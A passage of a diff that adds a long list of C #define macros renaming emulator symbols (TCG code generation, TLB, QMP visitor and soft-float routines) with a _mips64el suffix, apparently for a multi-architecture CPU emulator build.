+#define qint_destroy_obj qint_destroy_obj_mips64el +#define qint_from_int qint_from_int_mips64el +#define qint_get_int qint_get_int_mips64el +#define qint_type qint_type_mips64el +#define qlist_append_obj qlist_append_obj_mips64el +#define qlist_copy qlist_copy_mips64el +#define qlist_copy_elem qlist_copy_elem_mips64el +#define qlist_destroy_obj qlist_destroy_obj_mips64el +#define qlist_empty qlist_empty_mips64el +#define qlist_entry_obj qlist_entry_obj_mips64el +#define qlist_first qlist_first_mips64el +#define qlist_iter qlist_iter_mips64el +#define qlist_new qlist_new_mips64el +#define qlist_next qlist_next_mips64el +#define qlist_peek qlist_peek_mips64el +#define qlist_pop qlist_pop_mips64el +#define qlist_size qlist_size_mips64el +#define qlist_size_iter qlist_size_iter_mips64el +#define qlist_type qlist_type_mips64el +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_mips64el +#define qmp_input_end_list qmp_input_end_list_mips64el +#define qmp_input_end_struct qmp_input_end_struct_mips64el +#define qmp_input_get_next_type qmp_input_get_next_type_mips64el +#define qmp_input_get_object qmp_input_get_object_mips64el +#define qmp_input_get_visitor qmp_input_get_visitor_mips64el +#define qmp_input_next_list qmp_input_next_list_mips64el +#define qmp_input_optional qmp_input_optional_mips64el +#define qmp_input_pop qmp_input_pop_mips64el +#define qmp_input_push qmp_input_push_mips64el +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_mips64el +#define qmp_input_start_list qmp_input_start_list_mips64el +#define qmp_input_start_struct qmp_input_start_struct_mips64el +#define qmp_input_type_bool qmp_input_type_bool_mips64el +#define qmp_input_type_int qmp_input_type_int_mips64el +#define qmp_input_type_number qmp_input_type_number_mips64el +#define qmp_input_type_str qmp_input_type_str_mips64el +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_mips64el +#define qmp_input_visitor_new qmp_input_visitor_new_mips64el +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_mips64el +#define qmp_output_add_obj qmp_output_add_obj_mips64el +#define qmp_output_end_list qmp_output_end_list_mips64el +#define qmp_output_end_struct qmp_output_end_struct_mips64el +#define qmp_output_first qmp_output_first_mips64el +#define qmp_output_get_qobject qmp_output_get_qobject_mips64el +#define qmp_output_get_visitor qmp_output_get_visitor_mips64el +#define qmp_output_last qmp_output_last_mips64el +#define qmp_output_next_list qmp_output_next_list_mips64el +#define qmp_output_pop qmp_output_pop_mips64el +#define qmp_output_push_obj qmp_output_push_obj_mips64el +#define qmp_output_start_list qmp_output_start_list_mips64el +#define qmp_output_start_struct qmp_output_start_struct_mips64el +#define qmp_output_type_bool qmp_output_type_bool_mips64el +#define qmp_output_type_int qmp_output_type_int_mips64el +#define qmp_output_type_number qmp_output_type_number_mips64el +#define qmp_output_type_str qmp_output_type_str_mips64el +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_mips64el +#define qmp_output_visitor_new qmp_output_visitor_new_mips64el +#define qobject_decref qobject_decref_mips64el +#define qobject_to_qbool qobject_to_qbool_mips64el +#define qobject_to_qdict qobject_to_qdict_mips64el +#define qobject_to_qfloat qobject_to_qfloat_mips64el +#define qobject_to_qint qobject_to_qint_mips64el +#define qobject_to_qlist qobject_to_qlist_mips64el +#define qobject_to_qstring qobject_to_qstring_mips64el +#define qobject_type qobject_type_mips64el +#define qstring_append qstring_append_mips64el +#define qstring_append_chr qstring_append_chr_mips64el +#define qstring_append_int qstring_append_int_mips64el +#define qstring_destroy_obj qstring_destroy_obj_mips64el +#define qstring_from_escaped_str qstring_from_escaped_str_mips64el +#define qstring_from_str qstring_from_str_mips64el +#define qstring_from_substr qstring_from_substr_mips64el +#define qstring_get_length qstring_get_length_mips64el +#define qstring_get_str qstring_get_str_mips64el +#define qstring_new qstring_new_mips64el +#define qstring_type qstring_type_mips64el +#define ram_block_add ram_block_add_mips64el +#define ram_size ram_size_mips64el +#define range_compare range_compare_mips64el +#define range_covers_byte range_covers_byte_mips64el +#define range_get_last range_get_last_mips64el +#define range_merge range_merge_mips64el +#define ranges_can_merge ranges_can_merge_mips64el +#define raw_read raw_read_mips64el +#define raw_write raw_write_mips64el +#define rcon rcon_mips64el +#define read_raw_cp_reg read_raw_cp_reg_mips64el +#define recip_estimate recip_estimate_mips64el +#define recip_sqrt_estimate recip_sqrt_estimate_mips64el +#define register_cp_regs_for_features register_cp_regs_for_features_mips64el +#define register_multipage register_multipage_mips64el +#define register_subpage register_subpage_mips64el +#define register_tm_clones register_tm_clones_mips64el +#define register_types_object register_types_object_mips64el +#define regnames regnames_mips64el +#define render_memory_region render_memory_region_mips64el +#define reset_all_temps reset_all_temps_mips64el +#define reset_temp reset_temp_mips64el +#define rol32 rol32_mips64el +#define rol64 rol64_mips64el +#define ror32 ror32_mips64el +#define ror64 ror64_mips64el +#define roundAndPackFloat128 roundAndPackFloat128_mips64el +#define roundAndPackFloat16 roundAndPackFloat16_mips64el +#define roundAndPackFloat32 roundAndPackFloat32_mips64el +#define roundAndPackFloat64 roundAndPackFloat64_mips64el +#define roundAndPackFloatx80 roundAndPackFloatx80_mips64el +#define roundAndPackInt32 roundAndPackInt32_mips64el +#define roundAndPackInt64 roundAndPackInt64_mips64el +#define roundAndPackUint64 roundAndPackUint64_mips64el +#define round_to_inf round_to_inf_mips64el +#define run_on_cpu run_on_cpu_mips64el +#define s0 s0_mips64el +#define S0 S0_mips64el +#define s1 s1_mips64el +#define S1 S1_mips64el +#define sa1100_initfn sa1100_initfn_mips64el +#define sa1110_initfn sa1110_initfn_mips64el +#define save_globals save_globals_mips64el +#define scr_write scr_write_mips64el +#define sctlr_write sctlr_write_mips64el +#define set_bit set_bit_mips64el +#define set_bits set_bits_mips64el +#define set_default_nan_mode set_default_nan_mode_mips64el +#define set_feature set_feature_mips64el +#define set_float_detect_tininess set_float_detect_tininess_mips64el +#define set_float_exception_flags set_float_exception_flags_mips64el +#define set_float_rounding_mode set_float_rounding_mode_mips64el +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_mips64el +#define set_flush_to_zero set_flush_to_zero_mips64el +#define set_swi_errno set_swi_errno_mips64el +#define sextract32 sextract32_mips64el +#define sextract64 sextract64_mips64el +#define shift128ExtraRightJamming shift128ExtraRightJamming_mips64el +#define shift128Right shift128Right_mips64el +#define shift128RightJamming shift128RightJamming_mips64el +#define shift32RightJamming shift32RightJamming_mips64el +#define shift64ExtraRightJamming shift64ExtraRightJamming_mips64el +#define shift64RightJamming shift64RightJamming_mips64el +#define shifter_out_im shifter_out_im_mips64el +#define shortShift128Left shortShift128Left_mips64el +#define shortShift192Left shortShift192Left_mips64el +#define simple_mpu_ap_bits simple_mpu_ap_bits_mips64el +#define size_code_gen_buffer size_code_gen_buffer_mips64el +#define softmmu_lock_user softmmu_lock_user_mips64el +#define softmmu_lock_user_string softmmu_lock_user_string_mips64el +#define softmmu_tget32 softmmu_tget32_mips64el +#define softmmu_tget8 softmmu_tget8_mips64el +#define softmmu_tput32 softmmu_tput32_mips64el +#define softmmu_unlock_user softmmu_unlock_user_mips64el +#define sort_constraints sort_constraints_mips64el +#define sp_el0_access sp_el0_access_mips64el +#define spsel_read spsel_read_mips64el +#define spsel_write spsel_write_mips64el +#define start_list start_list_mips64el +#define stb_p stb_p_mips64el +#define stb_phys stb_phys_mips64el +#define stl_be_p stl_be_p_mips64el +#define stl_be_phys stl_be_phys_mips64el +#define stl_he_p stl_he_p_mips64el +#define stl_le_p stl_le_p_mips64el +#define stl_le_phys stl_le_phys_mips64el +#define stl_phys stl_phys_mips64el +#define stl_phys_internal stl_phys_internal_mips64el +#define stl_phys_notdirty stl_phys_notdirty_mips64el +#define store_cpu_offset store_cpu_offset_mips64el +#define store_reg store_reg_mips64el +#define store_reg_bx store_reg_bx_mips64el +#define store_reg_from_load store_reg_from_load_mips64el +#define stq_be_p stq_be_p_mips64el +#define stq_be_phys stq_be_phys_mips64el +#define stq_he_p stq_he_p_mips64el +#define stq_le_p stq_le_p_mips64el +#define stq_le_phys stq_le_phys_mips64el +#define stq_phys stq_phys_mips64el +#define string_input_get_visitor string_input_get_visitor_mips64el +#define string_input_visitor_cleanup string_input_visitor_cleanup_mips64el +#define string_input_visitor_new string_input_visitor_new_mips64el +#define strongarm_cp_reginfo strongarm_cp_reginfo_mips64el +#define strstart strstart_mips64el +#define strtosz strtosz_mips64el +#define strtosz_suffix strtosz_suffix_mips64el +#define stw_be_p stw_be_p_mips64el +#define stw_be_phys stw_be_phys_mips64el +#define stw_he_p stw_he_p_mips64el +#define stw_le_p stw_le_p_mips64el +#define stw_le_phys stw_le_phys_mips64el +#define stw_phys stw_phys_mips64el +#define stw_phys_internal stw_phys_internal_mips64el +#define sub128 sub128_mips64el +#define sub16_sat sub16_sat_mips64el +#define sub16_usat sub16_usat_mips64el +#define sub192 sub192_mips64el +#define sub8_sat sub8_sat_mips64el +#define sub8_usat sub8_usat_mips64el +#define subFloat128Sigs subFloat128Sigs_mips64el +#define subFloat32Sigs subFloat32Sigs_mips64el +#define subFloat64Sigs subFloat64Sigs_mips64el +#define subFloatx80Sigs subFloatx80Sigs_mips64el +#define subpage_accepts subpage_accepts_mips64el +#define subpage_init subpage_init_mips64el +#define subpage_ops subpage_ops_mips64el +#define subpage_read subpage_read_mips64el +#define subpage_register subpage_register_mips64el +#define subpage_write subpage_write_mips64el +#define suffix_mul suffix_mul_mips64el +#define swap_commutative swap_commutative_mips64el +#define swap_commutative2 swap_commutative2_mips64el +#define switch_mode switch_mode_mips64el +#define switch_v7m_sp switch_v7m_sp_mips64el +#define syn_aa32_bkpt syn_aa32_bkpt_mips64el +#define syn_aa32_hvc syn_aa32_hvc_mips64el +#define syn_aa32_smc syn_aa32_smc_mips64el +#define syn_aa32_svc syn_aa32_svc_mips64el +#define syn_breakpoint syn_breakpoint_mips64el +#define sync_globals sync_globals_mips64el +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_mips64el +#define syn_cp14_rt_trap syn_cp14_rt_trap_mips64el +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_mips64el +#define syn_cp15_rt_trap syn_cp15_rt_trap_mips64el +#define syn_data_abort syn_data_abort_mips64el +#define syn_fp_access_trap syn_fp_access_trap_mips64el +#define syn_insn_abort syn_insn_abort_mips64el +#define syn_swstep syn_swstep_mips64el +#define syn_uncategorized syn_uncategorized_mips64el +#define syn_watchpoint syn_watchpoint_mips64el +#define syscall_err syscall_err_mips64el +#define system_bus_class_init system_bus_class_init_mips64el +#define system_bus_info system_bus_info_mips64el +#define t2ee_cp_reginfo t2ee_cp_reginfo_mips64el +#define table_logic_cc table_logic_cc_mips64el +#define target_parse_constraint target_parse_constraint_mips64el +#define target_words_bigendian target_words_bigendian_mips64el +#define tb_add_jump tb_add_jump_mips64el +#define tb_alloc tb_alloc_mips64el +#define tb_alloc_page tb_alloc_page_mips64el +#define tb_check_watchpoint tb_check_watchpoint_mips64el +#define tb_find_fast tb_find_fast_mips64el +#define tb_find_pc tb_find_pc_mips64el +#define tb_find_slow tb_find_slow_mips64el +#define tb_flush tb_flush_mips64el +#define tb_flush_jmp_cache tb_flush_jmp_cache_mips64el +#define tb_free tb_free_mips64el +#define tb_gen_code tb_gen_code_mips64el +#define tb_hash_remove tb_hash_remove_mips64el +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_mips64el +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mips64el +#define tb_invalidate_phys_range tb_invalidate_phys_range_mips64el +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_mips64el +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_mips64el +#define tb_jmp_remove tb_jmp_remove_mips64el +#define tb_link_page tb_link_page_mips64el +#define tb_page_remove tb_page_remove_mips64el +#define tb_phys_hash_func tb_phys_hash_func_mips64el +#define tb_phys_invalidate tb_phys_invalidate_mips64el +#define tb_reset_jump tb_reset_jump_mips64el +#define tb_set_jmp_target tb_set_jmp_target_mips64el +#define tcg_accel_class_init tcg_accel_class_init_mips64el +#define tcg_accel_type tcg_accel_type_mips64el +#define tcg_add_param_i32 tcg_add_param_i32_mips64el +#define tcg_add_param_i64 tcg_add_param_i64_mips64el +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_mips64el +#define tcg_allowed tcg_allowed_mips64el +#define tcg_canonicalize_memop tcg_canonicalize_memop_mips64el +#define tcg_commit tcg_commit_mips64el +#define tcg_cond_to_jcc tcg_cond_to_jcc_mips64el +#define tcg_constant_folding tcg_constant_folding_mips64el +#define tcg_const_i32 tcg_const_i32_mips64el +#define tcg_const_i64 tcg_const_i64_mips64el +#define tcg_const_local_i32 tcg_const_local_i32_mips64el +#define tcg_const_local_i64 tcg_const_local_i64_mips64el +#define tcg_context_init tcg_context_init_mips64el +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_mips64el +#define tcg_cpu_exec tcg_cpu_exec_mips64el +#define tcg_current_code_size tcg_current_code_size_mips64el +#define tcg_dump_info tcg_dump_info_mips64el +#define tcg_dump_ops tcg_dump_ops_mips64el +#define tcg_exec_all tcg_exec_all_mips64el +#define tcg_find_helper tcg_find_helper_mips64el +#define tcg_func_start tcg_func_start_mips64el +#define tcg_gen_abs_i32 tcg_gen_abs_i32_mips64el +#define tcg_gen_add2_i32 tcg_gen_add2_i32_mips64el +#define tcg_gen_add_i32 tcg_gen_add_i32_mips64el +#define tcg_gen_add_i64 tcg_gen_add_i64_mips64el +#define tcg_gen_addi_i32 tcg_gen_addi_i32_mips64el +#define tcg_gen_addi_i64 tcg_gen_addi_i64_mips64el +#define tcg_gen_andc_i32 tcg_gen_andc_i32_mips64el +#define tcg_gen_and_i32 tcg_gen_and_i32_mips64el +#define tcg_gen_and_i64 tcg_gen_and_i64_mips64el +#define tcg_gen_andi_i32 tcg_gen_andi_i32_mips64el +#define tcg_gen_andi_i64 tcg_gen_andi_i64_mips64el +#define tcg_gen_br tcg_gen_br_mips64el +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mips64el +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mips64el +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mips64el +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mips64el +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mips64el +#define tcg_gen_callN tcg_gen_callN_mips64el +#define tcg_gen_code tcg_gen_code_mips64el +#define tcg_gen_code_common tcg_gen_code_common_mips64el +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_mips64el +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mips64el +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_mips64el +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mips64el +#define tcg_gen_exit_tb tcg_gen_exit_tb_mips64el +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mips64el +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mips64el +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mips64el +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mips64el +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mips64el +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mips64el +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mips64el +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mips64el +#define tcg_gen_goto_tb tcg_gen_goto_tb_mips64el +#define tcg_gen_ld_i32 tcg_gen_ld_i32_mips64el +#define tcg_gen_ld_i64 tcg_gen_ld_i64_mips64el +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_mips64el +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_mips64el +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mips64el +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mips64el +#define tcg_gen_mov_i32 tcg_gen_mov_i32_mips64el +#define tcg_gen_mov_i64 tcg_gen_mov_i64_mips64el +#define tcg_gen_movi_i32 tcg_gen_movi_i32_mips64el +#define tcg_gen_movi_i64 tcg_gen_movi_i64_mips64el +#define tcg_gen_mul_i32 tcg_gen_mul_i32_mips64el +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mips64el +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mips64el +#define tcg_gen_neg_i32 tcg_gen_neg_i32_mips64el +#define tcg_gen_neg_i64 tcg_gen_neg_i64_mips64el +#define tcg_gen_not_i32 tcg_gen_not_i32_mips64el +#define tcg_gen_op0 tcg_gen_op0_mips64el +#define tcg_gen_op1i tcg_gen_op1i_mips64el +#define tcg_gen_op2_i32 tcg_gen_op2_i32_mips64el +#define tcg_gen_op2_i64 tcg_gen_op2_i64_mips64el +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_mips64el +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_mips64el +#define tcg_gen_op3_i32 tcg_gen_op3_i32_mips64el +#define tcg_gen_op3_i64 tcg_gen_op3_i64_mips64el +#define tcg_gen_op4_i32 tcg_gen_op4_i32_mips64el +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_mips64el +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_mips64el +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_mips64el +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_mips64el +#define tcg_gen_op6_i32 tcg_gen_op6_i32_mips64el +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_mips64el +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_mips64el +#define tcg_gen_orc_i32 tcg_gen_orc_i32_mips64el +#define tcg_gen_or_i32 tcg_gen_or_i32_mips64el +#define tcg_gen_or_i64 tcg_gen_or_i64_mips64el +#define tcg_gen_ori_i32 tcg_gen_ori_i32_mips64el +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mips64el +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mips64el +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mips64el +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mips64el +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mips64el +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mips64el +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mips64el +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mips64el +#define tcg_gen_sar_i32 tcg_gen_sar_i32_mips64el +#define tcg_gen_sari_i32 tcg_gen_sari_i32_mips64el +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mips64el +#define tcg_gen_shl_i32 tcg_gen_shl_i32_mips64el +#define tcg_gen_shl_i64 tcg_gen_shl_i64_mips64el +#define tcg_gen_shli_i32 tcg_gen_shli_i32_mips64el +#define tcg_gen_shli_i64 tcg_gen_shli_i64_mips64el +#define tcg_gen_shr_i32 tcg_gen_shr_i32_mips64el +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_mips64el +#define tcg_gen_shr_i64 tcg_gen_shr_i64_mips64el +#define tcg_gen_shri_i32 tcg_gen_shri_i32_mips64el +#define tcg_gen_shri_i64 tcg_gen_shri_i64_mips64el +#define tcg_gen_st_i32 tcg_gen_st_i32_mips64el +#define tcg_gen_st_i64 tcg_gen_st_i64_mips64el +#define tcg_gen_sub_i32 tcg_gen_sub_i32_mips64el +#define tcg_gen_sub_i64 tcg_gen_sub_i64_mips64el +#define tcg_gen_subi_i32 tcg_gen_subi_i32_mips64el +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_mips64el +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_mips64el +#define tcg_gen_xor_i32 tcg_gen_xor_i32_mips64el +#define tcg_gen_xor_i64 tcg_gen_xor_i64_mips64el +#define tcg_gen_xori_i32 tcg_gen_xori_i32_mips64el +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_mips64el +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_mips64el +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_mips64el +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_mips64el +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_mips64el +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_mips64el +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_mips64el +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_mips64el +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_mips64el +#define tcg_handle_interrupt tcg_handle_interrupt_mips64el +#define tcg_init tcg_init_mips64el +#define tcg_invert_cond tcg_invert_cond_mips64el +#define tcg_la_bb_end tcg_la_bb_end_mips64el +#define tcg_la_br_end tcg_la_br_end_mips64el +#define tcg_la_func_end tcg_la_func_end_mips64el +#define tcg_liveness_analysis tcg_liveness_analysis_mips64el +#define tcg_malloc tcg_malloc_mips64el +#define tcg_malloc_internal tcg_malloc_internal_mips64el +#define tcg_op_defs_org tcg_op_defs_org_mips64el +#define tcg_opt_gen_mov tcg_opt_gen_mov_mips64el +#define tcg_opt_gen_movi tcg_opt_gen_movi_mips64el +#define tcg_optimize tcg_optimize_mips64el +#define tcg_out16 tcg_out16_mips64el +#define tcg_out32 tcg_out32_mips64el +#define tcg_out64 tcg_out64_mips64el +#define tcg_out8 tcg_out8_mips64el +#define tcg_out_addi tcg_out_addi_mips64el +#define tcg_out_branch tcg_out_branch_mips64el +#define tcg_out_brcond32 tcg_out_brcond32_mips64el +#define tcg_out_brcond64 tcg_out_brcond64_mips64el +#define tcg_out_bswap32 tcg_out_bswap32_mips64el +#define tcg_out_bswap64 tcg_out_bswap64_mips64el +#define tcg_out_call tcg_out_call_mips64el +#define tcg_out_cmp tcg_out_cmp_mips64el +#define tcg_out_ext16s tcg_out_ext16s_mips64el +#define tcg_out_ext16u tcg_out_ext16u_mips64el +#define tcg_out_ext32s tcg_out_ext32s_mips64el +#define tcg_out_ext32u tcg_out_ext32u_mips64el +#define tcg_out_ext8s tcg_out_ext8s_mips64el +#define tcg_out_ext8u tcg_out_ext8u_mips64el +#define tcg_out_jmp tcg_out_jmp_mips64el +#define tcg_out_jxx tcg_out_jxx_mips64el +#define tcg_out_label tcg_out_label_mips64el +#define tcg_out_ld tcg_out_ld_mips64el +#define tcg_out_modrm tcg_out_modrm_mips64el +#define tcg_out_modrm_offset tcg_out_modrm_offset_mips64el +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_mips64el +#define tcg_out_mov tcg_out_mov_mips64el +#define tcg_out_movcond32 tcg_out_movcond32_mips64el +#define tcg_out_movcond64 tcg_out_movcond64_mips64el +#define tcg_out_movi tcg_out_movi_mips64el +#define tcg_out_op tcg_out_op_mips64el +#define tcg_out_pop tcg_out_pop_mips64el +#define tcg_out_push tcg_out_push_mips64el +#define tcg_out_qemu_ld tcg_out_qemu_ld_mips64el +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_mips64el +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_mips64el +#define tcg_out_qemu_st tcg_out_qemu_st_mips64el +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_mips64el +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_mips64el +#define tcg_out_reloc tcg_out_reloc_mips64el +#define tcg_out_rolw_8 tcg_out_rolw_8_mips64el +#define tcg_out_setcond32 tcg_out_setcond32_mips64el +#define tcg_out_setcond64 tcg_out_setcond64_mips64el +#define tcg_out_shifti tcg_out_shifti_mips64el +#define tcg_out_st tcg_out_st_mips64el +#define tcg_out_tb_finalize tcg_out_tb_finalize_mips64el +#define tcg_out_tb_init tcg_out_tb_init_mips64el +#define tcg_out_tlb_load tcg_out_tlb_load_mips64el +#define tcg_out_vex_modrm tcg_out_vex_modrm_mips64el +#define tcg_patch32 tcg_patch32_mips64el +#define tcg_patch8 tcg_patch8_mips64el +#define tcg_pcrel_diff tcg_pcrel_diff_mips64el +#define tcg_pool_reset tcg_pool_reset_mips64el +#define tcg_prologue_init tcg_prologue_init_mips64el +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_mips64el +#define tcg_reg_alloc tcg_reg_alloc_mips64el +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_mips64el +#define tcg_reg_alloc_call tcg_reg_alloc_call_mips64el +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_mips64el +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_mips64el +#define tcg_reg_alloc_op tcg_reg_alloc_op_mips64el +#define tcg_reg_alloc_start tcg_reg_alloc_start_mips64el +#define tcg_reg_free tcg_reg_free_mips64el +#define tcg_reg_sync tcg_reg_sync_mips64el +#define tcg_set_frame tcg_set_frame_mips64el +#define tcg_set_nop tcg_set_nop_mips64el +#define tcg_swap_cond tcg_swap_cond_mips64el +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_mips64el +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_mips64el +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_mips64el +#define tcg_target_const_match tcg_target_const_match_mips64el +#define tcg_target_init tcg_target_init_mips64el +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_mips64el +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_mips64el +#define tcg_temp_alloc tcg_temp_alloc_mips64el +#define tcg_temp_free_i32 tcg_temp_free_i32_mips64el +#define tcg_temp_free_i64 tcg_temp_free_i64_mips64el +#define tcg_temp_free_internal tcg_temp_free_internal_mips64el +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_mips64el +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_mips64el +#define tcg_temp_new_i32 tcg_temp_new_i32_mips64el +#define tcg_temp_new_i64 tcg_temp_new_i64_mips64el +#define tcg_temp_new_internal tcg_temp_new_internal_mips64el +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_mips64el +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_mips64el +#define tdb_hash tdb_hash_mips64el +#define teecr_write teecr_write_mips64el +#define teehbr_access teehbr_access_mips64el +#define temp_allocate_frame temp_allocate_frame_mips64el +#define temp_dead temp_dead_mips64el +#define temps_are_copies temps_are_copies_mips64el +#define temp_save temp_save_mips64el +#define temp_sync temp_sync_mips64el +#define tgen_arithi tgen_arithi_mips64el +#define tgen_arithr tgen_arithr_mips64el +#define thumb2_logic_op thumb2_logic_op_mips64el +#define ti925t_initfn ti925t_initfn_mips64el +#define tlb_add_large_page tlb_add_large_page_mips64el +#define tlb_flush_entry tlb_flush_entry_mips64el +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_mips64el +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_mips64el +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_mips64el +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_mips64el +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_mips64el +#define tlbi_aa64_va_write tlbi_aa64_va_write_mips64el +#define tlbiall_is_write tlbiall_is_write_mips64el +#define tlbiall_write tlbiall_write_mips64el +#define tlbiasid_is_write tlbiasid_is_write_mips64el +#define tlbiasid_write tlbiasid_write_mips64el +#define tlbimvaa_is_write tlbimvaa_is_write_mips64el +#define tlbimvaa_write tlbimvaa_write_mips64el +#define tlbimva_is_write tlbimva_is_write_mips64el +#define tlbimva_write tlbimva_write_mips64el +#define tlb_is_dirty_ram tlb_is_dirty_ram_mips64el +#define tlb_protect_code tlb_protect_code_mips64el +#define tlb_reset_dirty_range tlb_reset_dirty_range_mips64el +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_mips64el +#define tlb_set_dirty tlb_set_dirty_mips64el +#define tlb_set_dirty1 tlb_set_dirty1_mips64el +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_mips64el +#define tlb_vaddr_to_host tlb_vaddr_to_host_mips64el +#define token_get_type token_get_type_mips64el +#define token_get_value token_get_value_mips64el +#define token_is_escape token_is_escape_mips64el +#define token_is_keyword token_is_keyword_mips64el +#define token_is_operator token_is_operator_mips64el +#define tokens_append_from_iter tokens_append_from_iter_mips64el +#define to_qiv to_qiv_mips64el +#define to_qov to_qov_mips64el +#define tosa_init tosa_init_mips64el +#define tosa_machine_init tosa_machine_init_mips64el +#define tswap32 tswap32_mips64el +#define tswap64 tswap64_mips64el +#define type_class_get_size type_class_get_size_mips64el +#define type_get_by_name type_get_by_name_mips64el +#define type_get_parent type_get_parent_mips64el +#define type_has_parent type_has_parent_mips64el +#define type_initialize type_initialize_mips64el +#define type_initialize_interface type_initialize_interface_mips64el +#define type_is_ancestor type_is_ancestor_mips64el +#define type_new type_new_mips64el +#define type_object_get_size type_object_get_size_mips64el +#define type_register_internal type_register_internal_mips64el +#define type_table_add type_table_add_mips64el +#define type_table_get type_table_get_mips64el +#define type_table_lookup type_table_lookup_mips64el +#define uint16_to_float32 uint16_to_float32_mips64el +#define uint16_to_float64 uint16_to_float64_mips64el +#define uint32_to_float32 uint32_to_float32_mips64el +#define uint32_to_float64 uint32_to_float64_mips64el +#define uint64_to_float128 uint64_to_float128_mips64el +#define uint64_to_float32 uint64_to_float32_mips64el +#define uint64_to_float64 uint64_to_float64_mips64el +#define unassigned_io_ops unassigned_io_ops_mips64el +#define unassigned_io_read unassigned_io_read_mips64el +#define unassigned_io_write unassigned_io_write_mips64el +#define unassigned_mem_accepts unassigned_mem_accepts_mips64el +#define unassigned_mem_ops unassigned_mem_ops_mips64el +#define unassigned_mem_read unassigned_mem_read_mips64el +#define unassigned_mem_write unassigned_mem_write_mips64el +#define update_spsel update_spsel_mips64el +#define v6_cp_reginfo v6_cp_reginfo_mips64el +#define 